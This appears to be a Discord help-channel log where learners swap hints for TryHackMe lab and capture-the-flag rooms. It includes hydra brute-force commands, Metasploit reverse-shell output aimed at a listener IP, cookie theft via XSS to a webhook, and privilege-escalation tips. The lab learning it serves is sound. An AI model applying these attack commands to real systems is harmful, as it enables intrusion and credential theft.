The word you are looking for is already in the ones you tried
thanks G, the answer is browser, instead of "web browser"
yes, thanks.
You need to verify to post screenshots
!docs verify
!docs verify
not here brother click on the link..
Does cracking the hash in DailyBugle really take this long?
nvm just cracked it
blowfish is a b*tch to crack holy
For powershell-empire build a Docker container. Like bloodhound-python, it runs better in Docker
I just built one because I can't find another solution that's "relatively easy"
yeah if possible can you tell me how to do so ':)
mind if I dm regarding this ?
Download the last image
docker pull bcsecurity/empire:latest
Run the SERVER with the rest api and socket ports open
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest
To run the CLIENT against the already running server container
docker container ls --> retrieve the id of the server container {container-id}
docker exec -it {container-id} ./ps-empire client
thank you so much for helping me out, let me try it out and see if I can run this
Gave +1 Rep to @jaunty elbow
It has to work.
Basically with docker you create an isolated environment with all the correct dependencies
ohh
honestly speaking, no idea about Docker..
I was going through a CTF challenge so I heard the name Dockerfile for the first time over there, no idea even how we can open it
ohh can you drop the link for it
thank you again buddy!!
Gave +1 Rep to @jaunty elbow
hello all, I am just getting started with the "starting point" labs and need some hints on a question that should be really easy, but I can't find the answer.
this is for tier1 "appointment" box. task 3. "What is the 2021 OWASP Top 10 Classification for this Vulnerability" referring to the classification name for sql injections. I have been all over the OWASP site for 2021 and I can't find any "classification name" e.g. ********_********n
I don't see anything that fits this pattern ? any hints would be appreciated
If I remember it correctly, isn't this HTB?
can I get a clue?
Room: common attacks
Task 2:
Questions: what was the original target of Stuxnet?
the answer is
*** **** ****** *********
I read the document
my guesses are
|| the iran ? ? || or || usb iran ||
third and fourth words are 6 and 9 characters long; any word I would associate with the answer is either too short or too long
The iran ...
Then name of the program they ran and was targeted
Make sure the spelling of the third one is correct, it's commonly mispronounced!
|| the iran natanz facility || is current guess
Gave +1 Rep to @honest wagon
I'm so sorry you are correct. I'm working in both environments.
By the way, are you sure it is not --_--*-?
oh yeah that didn't paste well, it's actually --------_--------n
I'll be sure to post to the correct group next time, thanks
Gave +1 Rep to @tropic garden
Isn't that the type of injection that lets you run or issue commands directly to the OS?
ah I got it thank you.. that helped and pointed me to the answer I needed, I appreciate it !!
Gave +1 Rep to @tropic garden
Hi guys, I need some help.
I tried various solutions but it doesn't work, I guess my browser can not load properly.
It is about Operating System Security. I need the answer to the very last question.
I can not attach a screenshot but I will provide a link:
https://tryhackme.com/room/operatingsystemsecurity
Thanks in advance
Log in as johnny, find the password from the bash history and log in via su - root
I logged in as johnny the first 2 times, now when I try it says that this user doesn't exist
!docs verify
Verify and provide screenshots please.
the bot doesn't even appear in the chat, idk why
su johnny
NOT
su - johnny
Sorry su root
No -
I don't think there is a user
"- root"
I'm sure there is
root
user
They've logged in as Johnny already, they need to go to root.
The "su -" command is utilized to switch to the root user account and create a login shell session. It means that it loads the environment of the target user, including the home directory, PATH, and other environment variables.
su - Commands
This command switches the user to the root user account and sets the environment variables to those of the root user.
It also changes the current directory to the root user's home directory.
This command is often used to execute commands as the root user.
su root Commands
This command switches the user to the root user account without changing the current environment variables or the current directory.
It requires the user to enter the root user's password to authenticate.
This command is often used to perform administrative tasks as the root user without affecting the current environment.
To switch to another user's account and start a new shell with their environment, use the "su - <username>" command.
The "su root" command switches to the root user account without creating a login shell. It means that it does not load the root user's environment. Here is the example of the su root command in
you never stop learning
That wasn't my point.
I know you can do all that.
However they are having an issue with the room, so it's best to provide support on the room with the material.
I didn't know that
Hi, I am doing Overpass 2 - Hacked and I am at the question: 'Using the fasttrack wordlist, how many of the system passwords were crackable?' I have the contents of ||/etc/shadow|| but I am missing the contents of ||/etc/passwd to unshadow and crack||. Crawling through the pcap file I learned that these weren't dumped by the attackers.
So basically I don't get how I would be able to crack the hashes and therefore know how many are crackable. What am I missing?
You don't really need to unshadow to crack the hashes, no?
All unshadow does is combine info from shadow and passwd. You can crack without usernames
The hashes themselves are in shadow only
Yeah, I just cracked it; the problem was that hashcat couldn't handle the 5 different types of hashes in that single file.
Thanks for the explanation though, that wasn't clear enough for me obviously. Well, now I learned two more things. Thanks @honest wagon
Gave +1 Rep to @honest wagon
Just when you think you got a little better you do some dumb shit like that
aka learning process
Yup
Hi there !
I'm currently trying to do the Upload Vulnerabilities - Tutorial room and I would like a hint on how to upload my shell for annex.uploadvulns.thm if this rings a bell to anyone...
'no responses'
would be helpful to tell us which room you are on exactly!
is your question how to bypass the server-side filtering? Bypassing the filter to upload was not so tricky for me, but getting it executed as php... what hint do you need exactly?
In fact I think I've found the way to bypass the server-side filtering. In the previous room we could use the upload button to transfer the shell. In this room I can't see how to do it with the term
if you type help you see 3 commands... type select and hit enter then you can select a file, type upload and hit enter and it will get uploaded
Man seriously... Would you believe I went so far because I didn't get that I wasn't supposed to use -select but select
I feel like my stepmother using her computer
But thanks for your answer, I can resume now
hahaha yeah I know that feeling... that happens
Happens sometimes, my brain goes far too often to "Quantic resolution needed" instead of just trying the easier way. "Uh, my screen is KO. Yeah, you should write your own Linux driver." "Wait... is the cable ok?"
hahaha, if you want weirder solutions for your upload problem you could try deactivating JavaScript to get rid of this fake terminal, or upload it by inserting it with Burp (:
Nah it's ok I'll carry on peacefully
And just to finish me
I always try to do the task without looking at the "hint"
"Commands do not start with a "-". Just use the word itself"
THM{TeslasSpirit0wn3d}
Hi guys, I have been trying to log in as Johnny for a couple of days now but I guess my browser can not load it.
I would really appreciate it if someone gave me the answer for that room, so I can continue.
I will provide a link:
https://tryhackme.com/room/operatingsystemsecurity
Thanks in advance
It's asking you to switch to su - root
Are you entering the password wrong?
no, 1 time I have access and then 50 times I don't
Are you in root?
it should be that, right?
No, you're root in the attackbox.
ok..?
Wrong machine
In your screenshot, you spelt Johnny wrong.
you used jonny@10.10.210.17
which machine am I supposed to load, I don't get it
Did you press the start machine button?
Having some trouble with starting your TryHackMe machine? Not to worry, here are some steps to get you started.
Have a read over this, it will be clearer.
that doesn't really help, I don't have a problem accessing the machine, it is just that the commands are not working
What's the ip that has populated that field I highlighted?
^ ?
Sorry if you find a newbie like me annoying, but it is frustrating for me.
here is the ip that is shown, what should I do with it
Yeah
yes
it's about the client asking you if you want to trust this server (this key) because you have not connected to it before
it shows different thing every time I try
You forgot the @
I have tried, it gives an error again
take a look : access denied
now write - su root?
su - root
authentication failure
Are you using the password in the second question?
I used his password ( abc123) to log in, then after every command I have to write it again
but still access denied.. like..?
I want to try to brute force a web login. The form makes a POST request to auth/login.php, but with wrong credentials I don't get any feedback other than the site being reloaded on /index.php... that brings me to the question of how to capture that as a wrong try with hydra, any idea? or should I use Burp (but it's too slow...)
if you do su - root it will ask you for the root password, not johnny's.
You could try OWASP ZAP?
okay, will have a look at it, never heard about it (: thx!
No.
I've told you the steps to do.
I can show you in a video.
thank you!
Gave +1 Rep to @lucid junco
@white salmon sometimes it is a good idea to step back a bit, do something else, and then when you have some distance from the problem come back, sit down and read from the beginning what is going on there and try to do it... maybe Linux Fundamentals could also be a good room for you: https://tryhackme.com/room/linuxfundamentalspart1
For burp, don't you only need to identify the request payload (including the page you need to send the request to) once so you can do the brute force via hydra?
as far as I know, with hydra I need to specify what is returned if the login fails. Concerning hydra the question would be how to tell hydra that a site reload means wrong credentials...
@strong lance it probably doesn't get reloaded right away, but sends you a 302 response with Location: header
This can be used to instruct fuzzers and bruteforcers to treat it as a wrong result. As correct login will 99% send you on the other page in a similar way or return 200
@honest wagon hm, interesting, I'll try that later, didn't see that, thx
Gave +1 Rep to @honest wagon
Try setting failure condition to index.php first
If not working, study the response on bad login in more detail and find something fingerprinty there
Can someone give me a little hint for the Capstone Challenge in the Linux Privilege Escalation room? I came so far and got the first flag. After switching over to the second user on the system I noticed that there is perl on the machine, or at least a perl folder under /home/missy, and that /home/missy/scripts is in the $PATH variable. The scripts directory itself is missing; I was able to create it. But from here I am a bit stuck, and my research does not bring me much further...
A little push in the right direction is appreciated, thanks
don't forget there are a lot of ways to escalate privileges, not only SUID or cronjobs but also
ok I will try something
Capabilities wont work
and there is no kernel exploit
correct and correct
I did it
one of the tasks in the room talks about this vector... it is obvious if you know how to enumerate that tool
nice
as the first user I was not allowed to use sudo -l, that is why I did not try it with the new one
But then I tried and figured out that I can use sudo find, and I used that to get my root shell
Thanks
can any one give me a hint in The Marketplace room ?
Where are you at the moment in the room ?
trying to steal the admin cookies
lol I was using it and I used a webhook to receive the admin cookie but nothing happened; it works on me but on the admin it doesn't work
Maybe wait for some time or restart the room i guess.
I will restart the room and try again
Make sure cookies are not marked with HttpOnly flag
If they are, you're not stealing them
the problem is that I was sending to the webhook
and the machine isn't connected to the internet
it wasn't using it
I want to cry now
Extract with a local web server and you'll be fine then
yes i will do
Can anybody help me with the Web Enumeration (https://tryhackme.com/room/webenumerationv2) room?
I'm having trouble scanning for virtual hosts on the machine. I already added the /etc/hosts entry to point to the machine IP
When I scan, I get a lot of found matches, but none with code 200 (the answer at 1.3 should only have 2 subdomains)
Don't quote me but I believe it is resulting in that because you are using the vhost setting; try using the DNS setting in gobuster and see if the results are successful.
If not then use dirbuster. I have had this problem and doing one of the two things I have said fixed the issue you are having
Finally found the problem on reddit. Apparently it's a problem with that version. Some user suggested doing it from the Attackbox. My solution was to use the flag --append-domain
Another user also suggested the dns mode (which didn't work for me). I doubt it because the room specifically says that there is a vhost running
Thanks for the help!
yeah I have always had a problem when wanting to enumerate subdomains because 9 times out of 10 I get the result you got and it's too annoying
Anyone able to give me a hint in the new CTF challenge "grep"? Been stuck for over an hour and can't even answer the first question. It says the CTF relies on recon and OSINT but it feels like I have done almost everything and found nothing sadly. Any hints?
Unfortunately, there is a 72-hour no-hints policy for newly released boxes.
I'll come back in 72 hours
any hint for this bash file #!/bin/bash
echo "Backing up files...";
tar cf /opt/backups/backup.tar *
to do privilege escalation
just search privesc using tar on google , you will find articles about it
Check if it's a cronjob and you can edit the file
nah it was a script and I have solved the machine finally
Protocols and Servers 2
https://discordapp.com/channels/521382216299839518/522158539129618453/1142506056426209292
how do i get flag 16 Windows Local Persistence
You around?
ye
hello
Nearly through the Yara room. Being asked about the conditions in file2.yar (pretty sure this is the file it's asking about). The file has to be less than... and it's staring at me at the bottom of the file but doesn't match the answer format. Any more hints?
i have been doing this room
https://tryhackme.com/room/anthem
and I got into the Umbraco admin panel, and I got an information disclosure type error from a preview error when trying LFI. Tried uploading rev shells to posts, images etc, changed redirection to rev shells, but everything is taken as strings.
a hint for the rev shell would be helpful. Is it via LFI or am I missing something?
a hint would be greatly appreciated
There are multiple ways:
- scp
- host a python http.server on the source machine and download it via wget.
- nc
- Host a python upload server on the machine where you want to save the file and send it from the source via the curl -X post or wget --post-file command.
any hints about the sequel of Wonderland, i.e. Looking Glass? Ran nmap and all the ports I get are SSH ports
Same problem here. Ports || 9000 to 13000~ || are open and most of these are rabbit holes.
I have an idea on how to filter them out, but can't get my head around it yet so I moved to other boxes first. Hopefully when I complete the bash scripting room.
I was looking into dropbear SSH and I stumbled on vulnerabilities where it allows code execution in the ssh command itself
maybe something which can be used
nice
who is here the best hacker ?
can you hack a phone only by its number ?
No, I don't dabble in phone hacks.
now why would you want to do that?
because I need an intelligent team member who can have power in an emergency
o.O
yup
can you explain what rabbit holes are ':)
Rabbit holes are potentially something you find which looks vulnerable but isn't really; it's a deceptive time sink.
ohhh
thank you
Gave +1 Rep to @lucid junco
so how can we differentiate if a port that is open is rabbit hole or not ?
At the start, you don't, that's where enumeration comes into play.
^^ enumeration and process of elimination
okie, seems like I need to learn more about this!!
thank you
Gave +1 Rep to @tropic garden
There is nothing here. I'm an idiot.
lol
Hi, any resource to walk through the Android Hacking 101 TryHackMe room? Like a YouTube video walkthrough?
I have a question about the gamezone room https://tryhackme.com/room/gamezone# task 5: how do I know port 1000 is being blocked from the outside by a firewall, and what does outside refer to?
medium has a lot of walkthroughs
search the room on medium
They said from IPtable list
sudo iptables -L -v -n
thanks, I wasn't sure if I was supposed to run iptables or I missed something in an earlier output
Gave +1 Rep to @jaunty elbow
from outside with nmap, the output near the port should be
filtered
since I am not able to use sudo with the account I've sshed into, what should I do instead for iptables?
Can someone give me a hint on task 6 of the gamezone room https://tryhackme.com/room/gamezone#? I looked up webmin with the version on searchsploit, then used the exploit I found in meterpreter ||unix/webapp/webmin_show_cgi_exec and when I set all the options and add a payload I tried payloads:
/cmd/unix/reverse Unix Command Shell, Double Reverse TCP (telnet)
[*] Started reverse TCP double handler on 10.6.58.176:4444
[*] Attempting to login...
[-] Authentication failed
[*] Exploit completed, but no session was created.
payload/cmd/unix/reverse_bash_telnet_ssl Unix Command Shell, Reverse TCP SSL (telnet)
[*] Started reverse SSL handler on 10.6.58.176:4444
[*] Attempting to login...
[-] Authentication failed
[*] Exploit completed, but no session was created.||
Thanks for the help in advance!
On the last question of task 8 on https://tryhackme.com/room/passwordattacks I have created the wordlist file using:
john --wordlist=clinic.lst --rules=single-extra --stdout > pass.txt.
I then run:
hydra -l burgess -P pass.txt 10.10.X.X http-post-form "/login-post:username=^USER^&password=^PASS^:S=logout.php", but I am not having any success with this command. Can someone point out my error please?
I have also tried hydra -l burgess -P pass.txt 10.10.X.X http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php"
you have to run the exploit through an ssh tunnel
maybe check the failure options
:S=logout.php
shadow stuck a -f at the end of that command
hydra -l burgess -P custom2.lst 10.10.48.200 http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
if that still does not help shadow would recommend looking at the amount of lines of your pass.txt
I tried
hydra -l burgess -P pass.txt 10.10.X.X http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
and
hydra -l burgess -P custom2.lst 10.10.48.200 http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:F=Incorrect username or password." -f
No success.
My pass.txt has 537026 potential passwords.
What would shadow do in this situation?
Could you show a screenshot of the command your ran and the output of it?
the second command you posted there uses the wrong name for the password list and most definitely the wrong ip
sorry, I was just using a generic ip.
And the one with logout.php ?
Well I got it now. Not sure if I was just not being patient enough.
@alpine kestrel Thanks!
Gave +1 Rep to @alpine kestrel
@left thunder Thanks!
I would assume a typo or something, that's why I rather see screenshots
I appreciate it. Thanks again
no problem... took a bit for shadow to figure out the right command for that task too but saved the commands shadow used to make sure for future reference
Hey, sorry, but medium, is it on this channel? I am not sure actually
@knotty peak is referring to https://medium.com/ as there are folks who post their write-ups on the platform.
On the last question on http://tryhackme.com/room/introwebapplicationsecurity. Could someone please help?
what is the problem
Click the View Site button.
Check the other users to discover which user account was used to make the malicious changes and revert them
IDOR vuln
you have to manually find the user who sabotaged the orders
Doesn't setting the options and payload in msfconsole run it through ssh?
Do I need to set the proxy option?
I think I found my problem
I understand what you are saying. Thanks for the help
Gave +1 Rep to @jaunty elbow
If you don't mind, can you (or anyone) explain to me why I have to have the ssh tunnel running in order for it to work? Is it because that's the only way to get past the firewall which would prevent me from being able to connect to port 10000?
doing the Looking Glass room... and I can't even get initial access
can I get a hint as to what I'm supposed to do?
or what direction to take?
What have you tried?
?
ssh_version, ssh_enumusers
I tried to find any vulns
to the specific version
Have you got access to an ssh port?
scan for all open ports using nmap.... then try and ssh into some of the open ssh ports
22 and above 9000
There's only one you can log in to
"ssh" ports
Have you tried connecting to any?
yeah, 22
What did it say?
when i try to connect to it
Yes.
it asks me for a password
Ok, have you tried any other ports?
no
you should try that.
is there a script or that?
for that*
so many portssssss
There is....
but you don't really need a script
it should be obvious if you connect to a few of those other ports
^
my irl instincts are saying there is a firewall
Nah.
Ik....just thinking out loud rn
nope no firewall except if you are running one on your kali vm or windows machine
bas kali
base*
no vm
no fw
the only obvious port is 22...for me...i did a nmap sV and for all others i get dropbear 2.0 ssh
Yeah, they're all valid ports, try connect to one.
well go on... try connect to some of those dropbear 2.0 ssh ports
it gives me an option to accept the fingerprint
but says the connection cant be established
the ports seem false positive
What did it say?
The authenticity of host '[10.10.178.142]:9101 ([10.10.178.142]:9101)' can't be established.
RSA key fingerprint is SHA256:iMwNI8HsNKoZQ7O0IFs1Qt8cf0ZDq2uI8dIK97XGPj0.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:69: [hashed name]
~/.ssh/known_hosts:70: [hashed name]
~/.ssh/known_hosts:71: [hashed name]
~/.ssh/known_hosts:72: [hashed name]
~/.ssh/known_hosts:73: [hashed name]
~/.ssh/known_hosts:74: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.178.142]:9101' (RSA) to the list of known hosts.
Lower
Connection to 10.10.178.142 closed.
see the line after the Warning line
lower?
yuups
Better get searching
lower port? I'm not getting this at all
it has nothing to do with security really, it's a puzzle and programming challenge
good guess.... though this is wonderland inspired
also known as opposite day....
The name of the room, is a hint.
Have fun!
Ohh yes im having soooo much fun...get the sarcasm
I actually enjoyed this room.
i found the original poem lol
i just need to find out how to get the secret out
Do the poems match?
Thanks so much. I'm going to check it out
thank you for the help
after 2h
i got the root flag
honestly priv esc is getting easier than initial access hahaha
Private room
just to talk and compare
with these ports and an NTLM hash what would you try to do?
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server?
5040/tcp open unknown
hey all I am having trouble with 2 questions in the SOC velociraptor path:
task 3: What is listed as the agent version?
task 7: What are the arguments for parse_mft()?
Thanks in advance
I'm on Task 3 of Walking an Application of Jr Penetration Tester:
What is the directory listing flag?
I put THM{NOT_SO_HIDDEN}
But it's saying it's incorrect? I've found all the other ones and now that flag but it's saying it's incorrect??
i copied the img.flag{} background image url and it took me to that flag.
the flag you found is incorrect for the task
could you help me find it I've been looking at all of these css directories and cannot find any txt